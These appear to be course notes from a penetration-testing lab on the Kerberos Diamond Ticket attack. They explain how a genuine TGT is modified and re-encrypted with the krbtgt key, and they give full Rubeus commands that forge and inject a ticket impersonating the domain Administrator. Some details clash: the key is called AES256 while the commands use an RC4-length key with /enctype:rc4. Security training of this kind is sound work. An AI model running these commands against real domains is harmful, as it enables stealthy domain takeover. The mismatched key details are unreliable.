8.3 - Diamond Ticket

Diamond Ticket (TGT Modification Attack)

A Diamond Ticket is a modified version of a legitimate TGT (Ticket Granting Ticket). Unlike Golden Tickets, which are completely forged from scratch, Diamond Tickets are based on real TGTs that are decrypted, modified, and re-encrypted using the krbtgt account key.

---

Key Characteristics

• A Diamond Ticket is a TGT modification attack, whereas a Golden Ticket is a TGT forgery attack.

• A legitimate TGT is captured and decrypted, its content (e.g., username, groups) is modified, and then it is re-encrypted with the krbtgt AES key.

• The ticket will have valid timestamps, since they are inherited from a real DC-issued ticket.

• More stealthy than Golden Tickets because:

  • TGT appears genuinely issued by the DC.

  • TGS requests based on this ticket match an actual TGT.

  • Less detectable by SIEMs and monitoring tools.

• Persistence duration depends on TGT lifetime and krbtgt key rotation policy.

---

Forge a Diamond Ticket with Credentials

You can use Rubeus to create a Diamond Ticket using the krbtgt AES key and the credentials of a domain user:

Rubeus.exe diamond /krbkey:d7ac4db5b820be57cc79f58f196a0e5b /user:devan /password:new_password123 /enctype:rc4 /ticketuser:Administrator /domain:dev-angelist.lab /dc:corp-dc.dev-angelist.lab /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

---

Forge a Diamond Ticket Using /tgtdeleg

If you already have a TGT delegation token (captured via Rubeus tgtdeleg), you can generate a Diamond Ticket without needing user credentials:

Rubeus.exe diamond /krbkey:d7ac4db5b820be57cc79f58f196a0e5b /tgtdeleg /enctype:rc4 /ticketuser:Administrator /domain:dev-angelist.lab /dc:corp-dc.dev-angelist.lab /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

---

Parameters Explained

Option	Description
/diamond	Rubeus module for crafting a Diamond Ticket.
/krbkey:<key>	AES256 key of the krbtgt account (required for re-encryption).
/user:studentx + /password:...	Domain user credentials to request the real TGT.
/tgtdeleg	Uses a captured TGT delegation token instead of user credentials.
/ticketuser:administrator	User to impersonate in the new ticket.
/ticketuserid:500	RID of the impersonated user (default 500 = Administrator).
/groups:512	Groups the impersonated user should be a member of.
/domain, /dc	Target domain and Domain Controller.
/enctype:aes	Encryption type (must match the krbtgt key used).
/createnetonly:<path>	Creates a netonly logon session to isolate the context (e.g., spawn cmd).
/show	Displays the forged ticket before injection.
/ptt	Injects the forged ticket into the current session.

Labs

• Learning Object 10 lab